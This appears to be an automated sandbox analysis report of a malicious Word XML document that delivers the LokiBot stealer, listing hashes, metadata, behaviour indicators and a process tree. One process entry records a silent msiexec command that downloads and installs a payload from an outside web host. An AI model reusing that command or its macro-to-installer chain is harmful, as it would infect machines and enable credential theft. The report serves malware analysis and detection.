File name:

ac1b391230816b46484610a4b474eb4d0996eef57b0a147f341297204cd191f0

Full analysis: https://app.any.run/tasks/569bcfaa-8cfa-40f7-a55c-7b3600f1872d
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 08, 2018, 06:53:11
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
exe-to-msi
loader
lokibot
Indicators:
MIME: text/xml
File info: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
MD5:

D3265BF4490965C523CFD235990E2DE3

SHA1:

DBF3A4E9DDE6100B521827D71354C57093FFE0BD

SHA256:

AC1B391230816B46484610A4B474EB4D0996EEF57B0A147F341297204CD191F0

SSDEEP:

3072:eI3HHjWUU38bONpQYDmbmvDuBUKTrXraCtHlpORaAs/vUEMVXpKxq:tjWUNONNrSBUKTrOwl0hsXUEM9b

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses Microsoft Installer as loader

      • WINWORD.EXE (PID: 1264)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 1264)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 2932)
    • Connects to CnC server

      • MSI4F66.tmp (PID: 1588)
    • LOKIBOT was detected

      • MSI4F66.tmp (PID: 1588)
    • Detected artifacts of LokiBot

      • MSI4F66.tmp (PID: 1588)
    • Actions looks like stealing of personal data

      • MSI4F66.tmp (PID: 1588)
  • SUSPICIOUS

    • Drop ExeToMSI Application

      • msiexec.exe (PID: 2932)
    • Loads DLL from Mozilla Firefox

      • MSI4F66.tmp (PID: 1588)
    • Creates files in the user directory

      • MSI4F66.tmp (PID: 1588)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 2932)
      • MSI4F66.tmp (PID: 1588)
    • Starts Microsoft Office Application

      • MSOXMLED.EXE (PID: 3884)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1264)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 2932)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 2932)
      • MSI4F66.tmp (PID: 2192)
    • Application was dropped or rewritten from another process

      • MSI4F66.tmp (PID: 1588)
      • MSI4F66.tmp (PID: 2192)
    • Application launched itself

      • MSI4F66.tmp (PID: 2192)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 1264)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (43.7)
.rels | Open Office XML Relationships (28.2)
.xml | Microsoft Office XML Flat File Format (ASCII) (20.8)
.svg | Scalable Vector Graphics (var.3) (4.5)
.xml | Generic XML (ASCII) (1.5)

EXIF

XMP

PackagePartName: /_rels/.rels
PackagePartContentType: application/vnd.openxmlformats-package.relationships+xml
PackagePartPadding: 512
PackagePartXmlDataRelationshipsXmlns: http://schemas.openxmlformats.org/package/2006/relationships
PackagePartXmlDataRelationshipsRelationshipId: rId3
PackagePartXmlDataRelationshipsRelationshipType: http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties
PackagePartXmlDataRelationshipsRelationshipTarget: docProps/app.xml
PackagePartXmlDataDocumentIgnorable: w14 w15 w16se w16cid wp14
PackagePartXmlDataDocumentBodyPRsidR: 00380709
PackagePartXmlDataDocumentBodyPRsidRDefault: 00380709
PackagePartXmlDataDocumentBodyPBookmarkStartId: -
PackagePartXmlDataDocumentBodyPBookmarkStartName: _GoBack
PackagePartXmlDataDocumentBodyPBookmarkEndId: -
PackagePartXmlDataDocumentBodyPRRPrNoProof: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorDistT: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorDistB: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorDistL: 114300
PackagePartXmlDataDocumentBodyPRDrawingAnchorDistR: 114300
PackagePartXmlDataDocumentBodyPRDrawingAnchorSimplePos: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorRelativeHeight: 251658240
PackagePartXmlDataDocumentBodyPRDrawingAnchorBehindDoc: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorLocked: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorLayoutInCell: 1
PackagePartXmlDataDocumentBodyPRDrawingAnchorAllowOverlap: 1
PackagePartXmlDataDocumentBodyPRDrawingAnchorSimplePosX: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorSimplePosY: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorPositionHRelativeFrom: column
PackagePartXmlDataDocumentBodyPRDrawingAnchorPositionHPosOffset: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorPositionVRelativeFrom: paragraph
PackagePartXmlDataDocumentBodyPRDrawingAnchorPositionVPosOffset: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorExtentCx: 4649492
PackagePartXmlDataDocumentBodyPRDrawingAnchorExtentCy: 4649492
PackagePartXmlDataDocumentBodyPRDrawingAnchorEffectExtentL: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorEffectExtentT: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorEffectExtentR: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorEffectExtentB: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorWrapNone: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorDocPrId: 1
PackagePartXmlDataDocumentBodyPRDrawingAnchorDocPrName: Picture 1
PackagePartXmlDataDocumentBodyPRDrawingAnchorCNvGraphicFramePr: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataUri: http://schemas.openxmlformats.org/drawingml/2006/picture
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicNvPicPrCNvPrId: 1
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicNvPicPrCNvPrName: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicNvPicPrCNvPicPr: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicBlipFillBlipEmbed: rId5
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicBlipFillBlipExtLstExtUri: {28A0092B-C50C-407E-A947-70E740481C1C}
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicBlipFillBlipExtLstExtUseLocalDpiVal: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicBlipFillStretchFillRect: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrXfrmOffX: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrXfrmOffY: -
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrXfrmExtCx: 4649492
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrXfrmExtCy: 4649492
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrPrstGeomPrst: rect
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrPrstGeomAvLst: -
PackagePartXmlDataDocumentBodySectPrRsidR: 00380709
PackagePartXmlDataDocumentBodySectPrPgSzW: 12240
PackagePartXmlDataDocumentBodySectPrPgSzH: 15840
PackagePartXmlDataDocumentBodySectPrPgMarTop: 1440
PackagePartXmlDataDocumentBodySectPrPgMarRight: 1440
PackagePartXmlDataDocumentBodySectPrPgMarBottom: 1440
PackagePartXmlDataDocumentBodySectPrPgMarLeft: 1440
PackagePartXmlDataDocumentBodySectPrPgMarHeader: 720
PackagePartXmlDataDocumentBodySectPrPgMarFooter: 720
PackagePartXmlDataDocumentBodySectPrPgMarGutter: -
PackagePartXmlDataDocumentBodySectPrColsSpace: 720
PackagePartXmlDataDocumentBodySectPrDocGridLinePitch: 360
PackagePartBinaryData: (Binary data 46942 bytes, use -b option to extract)
PackagePartCompression: store
PackagePartXmlDataThemeName: Office Theme
PackagePartXmlDataThemeThemeElementsClrSchemeName: Office
PackagePartXmlDataThemeThemeElementsClrSchemeDk1SysClrVal: windowText
PackagePartXmlDataThemeThemeElementsClrSchemeDk1SysClrLastClr: 000000
PackagePartXmlDataThemeThemeElementsClrSchemeLt1SysClrVal: window
PackagePartXmlDataThemeThemeElementsClrSchemeLt1SysClrLastClr: FFFFFF
PackagePartXmlDataThemeThemeElementsClrSchemeDk2SrgbClrVal: 44546A
PackagePartXmlDataThemeThemeElementsClrSchemeLt2SrgbClrVal: E7E6E6
PackagePartXmlDataThemeThemeElementsClrSchemeAccent1SrgbClrVal: 4472C4
PackagePartXmlDataThemeThemeElementsClrSchemeAccent2SrgbClrVal: ED7D31
PackagePartXmlDataThemeThemeElementsClrSchemeAccent3SrgbClrVal: A5A5A5
PackagePartXmlDataThemeThemeElementsClrSchemeAccent4SrgbClrVal: FFC000
PackagePartXmlDataThemeThemeElementsClrSchemeAccent5SrgbClrVal: 5B9BD5
PackagePartXmlDataThemeThemeElementsClrSchemeAccent6SrgbClrVal: 70AD47
PackagePartXmlDataThemeThemeElementsClrSchemeHlinkSrgbClrVal: 0563C1
PackagePartXmlDataThemeThemeElementsClrSchemeFolHlinkSrgbClrVal: 954F72
PackagePartXmlDataThemeThemeElementsFontSchemeName: Office
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontLatinTypeface: Calibri Light
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontLatinPanose: 020F0302020204030204
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontEaTypeface: -
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontCsTypeface: -
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontFontScript: Jpan
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontFontTypeface: 游ゴシック Light
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontLatinTypeface: Calibri
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontLatinPanose: 020F0502020204030204
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontEaTypeface: -
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontCsTypeface: -
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontFontScript: Jpan
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontFontTypeface: 游明朝
PackagePartXmlDataThemeThemeElementsFmtSchemeName: Office
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstSolidFillSchemeClrVal: phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillRotWithShape: 1
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsPos: -
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrVal: phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrLumModVal: 110000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrSatModVal: 105000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrTintVal: 67000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillLinAng: 5400000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillLinScaled: -
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrShadeVal: 100000
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnW: 6350
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnCap: flat
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnCmpd: sng
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnAlgn: ctr
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnSolidFillSchemeClrVal: phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnPrstDashVal: solid
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnMiterLim: 800000
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLst: -
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwBlurRad: 57150
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwDist: 19050
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwDir: 5400000
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwAlgn: ctr
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwRotWithShape: -
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwSrgbClrVal: 000000
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwSrgbClrAlphaVal: 63000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrVal: phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrTintVal: 95000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrSatModVal: 170000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillRotWithShape: 1
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsPos: -
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrVal: phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrTintVal: 93000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrSatModVal: 150000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrShadeVal: 98000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrLumModVal: 102000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillLinAng: 5400000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillLinScaled: -
PackagePartXmlDataThemeObjectDefaults: -
PackagePartXmlDataThemeExtraClrSchemeLst: -
PackagePartXmlDataThemeExtLstExtUri: {05A4C25C-085E-4340-85A3-A5531E510DB2}
PackagePartXmlDataThemeExtLstExtThemeFamilyName: Office Theme
PackagePartXmlDataThemeExtLstExtThemeFamilyId: {62F939B6-93AF-4DB8-9C6B-D6C7DFDC589F}
PackagePartXmlDataThemeExtLstExtThemeFamilyVid: {4A3C46E8-61CC-4603-A589-7422A47A8E4A}
PackagePartXmlDataVbaSuppDataIgnorable: w14 w15 w16se w16cid wp14
PackagePartXmlDataVbaSuppDataDocEventsEventDocOpen: -
PackagePartXmlDataVbaSuppDataMcdsMcdMacroName: PROJECT.FVUD6UVDCPAIB5HGWC.S7FS5W_GWZDOIQ4UERQA
PackagePartXmlDataVbaSuppDataMcdsMcdName: Project.fVUd6uvDCPAiB5HGwC.S7Fs5W_GWzdOIQ4ueRqa
PackagePartXmlDataVbaSuppDataMcdsMcdBEncrypt: 00
PackagePartXmlDataVbaSuppDataMcdsMcdCmg: 56
PackagePartXmlDataSettingsIgnorable: w14 w15 w16se w16cid
PackagePartXmlDataSettingsZoomPercent: 100
PackagePartXmlDataSettingsDefaultTabStopVal: 720
PackagePartXmlDataSettingsCharacterSpacingControlVal: doNotCompress
PackagePartXmlDataSettingsCompatCompatSettingName: compatibilityMode
PackagePartXmlDataSettingsCompatCompatSettingUri: http://schemas.microsoft.com/office/word
PackagePartXmlDataSettingsCompatCompatSettingVal: 15
PackagePartXmlDataSettingsRsidsRsidRootVal: 00380709
PackagePartXmlDataSettingsRsidsRsidVal: 00380709
PackagePartXmlDataSettingsMathPrMathFontVal: Cambria Math
PackagePartXmlDataSettingsMathPrBrkBinVal: before
PackagePartXmlDataSettingsMathPrBrkBinSubVal: --
PackagePartXmlDataSettingsMathPrSmallFracVal: -
PackagePartXmlDataSettingsMathPrDispDef: -
PackagePartXmlDataSettingsMathPrLMarginVal: -
PackagePartXmlDataSettingsMathPrRMarginVal: -
PackagePartXmlDataSettingsMathPrDefJcVal: centerGroup
PackagePartXmlDataSettingsMathPrWrapIndentVal: 1440
PackagePartXmlDataSettingsMathPrIntLimVal: subSup
PackagePartXmlDataSettingsMathPrNaryLimVal: undOvr
PackagePartXmlDataSettingsThemeFontLangVal: en-US
PackagePartXmlDataSettingsClrSchemeMappingBg1: light1
PackagePartXmlDataSettingsClrSchemeMappingT1: dark1
PackagePartXmlDataSettingsClrSchemeMappingBg2: light2
PackagePartXmlDataSettingsClrSchemeMappingT2: dark2
PackagePartXmlDataSettingsClrSchemeMappingAccent1: accent1
PackagePartXmlDataSettingsClrSchemeMappingAccent2: accent2
PackagePartXmlDataSettingsClrSchemeMappingAccent3: accent3
PackagePartXmlDataSettingsClrSchemeMappingAccent4: accent4
PackagePartXmlDataSettingsClrSchemeMappingAccent5: accent5
PackagePartXmlDataSettingsClrSchemeMappingAccent6: accent6
PackagePartXmlDataSettingsClrSchemeMappingHyperlink: hyperlink
PackagePartXmlDataSettingsClrSchemeMappingFollowedHyperlink: followedHyperlink
PackagePartXmlDataSettingsShapeDefaultsShapedefaultsExt: edit
PackagePartXmlDataSettingsShapeDefaultsShapedefaultsSpidmax: 1026
PackagePartXmlDataSettingsShapeDefaultsShapelayoutExt: edit
PackagePartXmlDataSettingsShapeDefaultsShapelayoutIdmapExt: edit
PackagePartXmlDataSettingsShapeDefaultsShapelayoutIdmapData: 1
PackagePartXmlDataSettingsDecimalSymbolVal: .
PackagePartXmlDataSettingsListSeparatorVal: ,
PackagePartXmlDataSettingsChartTrackingRefBased: -
PackagePartXmlDataSettingsDocIdVal: {D24C6EB6-1E40-4F8D-93E2-A1BBB0912DFA}
PackagePartXmlDataPropertiesXmlns: http://schemas.openxmlformats.org/officeDocument/2006/extended-properties
PackagePartXmlDataPropertiesTemplate: Normal
PackagePartXmlDataPropertiesTotalTime: -
PackagePartXmlDataPropertiesPages: 1
PackagePartXmlDataPropertiesWords: -
PackagePartXmlDataPropertiesCharacters: 1
PackagePartXmlDataPropertiesApplication: Microsoft Office Word
PackagePartXmlDataPropertiesDocSecurity: -
PackagePartXmlDataPropertiesLines: 1
PackagePartXmlDataPropertiesParagraphs: 1
PackagePartXmlDataPropertiesScaleCrop: -
PackagePartXmlDataPropertiesCompany: -
PackagePartXmlDataPropertiesLinksUpToDate: -
PackagePartXmlDataPropertiesCharactersWithSpaces: 1
PackagePartXmlDataPropertiesSharedDoc: -
PackagePartXmlDataPropertiesHyperlinksChanged: -
PackagePartXmlDataPropertiesAppVersion: 16
PackagePartXmlDataStylesIgnorable: w14 w15 w16se w16cid
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsAsciiTheme: minorHAnsi
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsEastAsiaTheme: minorHAnsi
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsHAnsiTheme: minorHAnsi
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsCstheme: minorBidi
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrSzVal: 22
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrSzCsVal: 22
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangVal: en-US
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangEastAsia: en-US
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangBidi: ar-SA
PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingAfter: 160
PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingLine: 259
PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingLineRule: auto
PackagePartXmlDataStylesLatentStylesDefLockedState: -
PackagePartXmlDataStylesLatentStylesDefUIPriority: 99
PackagePartXmlDataStylesLatentStylesDefSemiHidden: -
PackagePartXmlDataStylesLatentStylesDefUnhideWhenUsed: -
PackagePartXmlDataStylesLatentStylesDefQFormat: -
PackagePartXmlDataStylesLatentStylesCount: 375
PackagePartXmlDataStylesLatentStylesLsdExceptionName: Normal
PackagePartXmlDataStylesLatentStylesLsdExceptionUiPriority: -
PackagePartXmlDataStylesLatentStylesLsdExceptionQFormat: 1
PackagePartXmlDataStylesLatentStylesLsdExceptionSemiHidden: 1
PackagePartXmlDataStylesLatentStylesLsdExceptionUnhideWhenUsed: 1
PackagePartXmlDataStylesStyleType: paragraph
PackagePartXmlDataStylesStyleDefault: 1
PackagePartXmlDataStylesStyleStyleId: Normal
PackagePartXmlDataStylesStyleNameVal: Normal
PackagePartXmlDataStylesStyleQFormat: -
PackagePartXmlDataStylesStyleUiPriorityVal: 1
PackagePartXmlDataStylesStyleSemiHidden: -
PackagePartXmlDataStylesStyleUnhideWhenUsed: -
PackagePartXmlDataStylesStyleTblPrTblIndW: -
PackagePartXmlDataStylesStyleTblPrTblIndType: dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarTopW: -
PackagePartXmlDataStylesStyleTblPrTblCellMarTopType: dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarLeftW: 108
PackagePartXmlDataStylesStyleTblPrTblCellMarLeftType: dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarBottomW: -
PackagePartXmlDataStylesStyleTblPrTblCellMarBottomType: dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarRightW: 108
PackagePartXmlDataStylesStyleTblPrTblCellMarRightType: dxa
PackagePartXmlDataCorePropertiesTitle: -
PackagePartXmlDataCorePropertiesSubject: -
PackagePartXmlDataCorePropertiesCreator: Central
PackagePartXmlDataCorePropertiesKeywords: -
PackagePartXmlDataCorePropertiesDescription: -
PackagePartXmlDataCorePropertiesLastModifiedBy: Central
PackagePartXmlDataCorePropertiesRevision: 1
PackagePartXmlDataCorePropertiesCreatedType: dcterms:W3CDTF
PackagePartXmlDataCorePropertiesCreated: 2018:11:06 18:40:00Z
PackagePartXmlDataCorePropertiesModifiedType: dcterms:W3CDTF
PackagePartXmlDataCorePropertiesModified: 2018:11:06 18:40:00Z
PackagePartXmlDataFontsIgnorable: w14 w15 w16se w16cid
PackagePartXmlDataFontsFontName: Calibri
PackagePartXmlDataFontsFontPanose1Val: 020F0502020204030204
PackagePartXmlDataFontsFontCharsetVal: 00
PackagePartXmlDataFontsFontFamilyVal: swiss
PackagePartXmlDataFontsFontPitchVal: variable
PackagePartXmlDataFontsFontSigUsb0: E0002AFF
PackagePartXmlDataFontsFontSigUsb1: C000247B
PackagePartXmlDataFontsFontSigUsb2: 00000009
PackagePartXmlDataFontsFontSigUsb3: 00000000
PackagePartXmlDataFontsFontSigCsb0: 000001FF
PackagePartXmlDataFontsFontSigCsb1: 00000000
PackagePartXmlDataWebSettingsIgnorable: w14 w15 w16se w16cid
PackagePartXmlDataWebSettingsOptimizeForBrowser: -
PackagePartXmlDataWebSettingsAllowPNG: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
6
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start msoxmled.exe no specs winword.exe no specs msiexec.exe no specs msiexec.exe msi4f66.tmp no specs #LOKIBOT msi4f66.tmp

Process information

PID
CMD
Path
Indicators
Parent process
916msiexec.exe /i http://socaleights.com//images/2014/jzfdyijsh.msi /quietC:\Windows\system32\msiexec.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
1264"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\ac1b391230816b46484610a4b474eb4d0996eef57b0a147f341297204cd191f0.xml"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEMSOXMLED.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
1588"C:\Windows\Installer\MSI4F66.tmp"C:\Windows\Installer\MSI4F66.tmp
MSI4F66.tmp
User:
admin
Company:
05becd92-1cea-493
Integrity Level:
MEDIUM
Description:
7686b9e3-e106-48c
Exit code:
0
Version:
20.77.130.168
Modules
Images
c:\windows\installer\msi4f66.tmp
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
2192"C:\Windows\Installer\MSI4F66.tmp"C:\Windows\Installer\MSI4F66.tmpmsiexec.exe
User:
admin
Company:
05becd92-1cea-493
Integrity Level:
MEDIUM
Description:
7686b9e3-e106-48c
Exit code:
0
Version:
20.77.130.168
Modules
Images
c:\windows\installer\msi4f66.tmp
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
2932C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
3884"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\Desktop\ac1b391230816b46484610a4b474eb4d0996eef57b0a147f341297204cd191f0.xml"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
XML Editor
Exit code:
0
Version:
14.0.4750.1000
Modules
Images
c:\program files\common files\microsoft shared\office14\msoxmled.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
Total events
1 446
Read events
795
Write events
632
Delete events
19

Modification events

(PID) Process:(1264) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:;~!
Value:
3B7E2100F0040000010000000000000000000000
(PID) Process:(1264) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(1264) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(3884) MSOXMLED.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1298661393
(PID) Process:(1264) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1298661394
(PID) Process:(1264) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
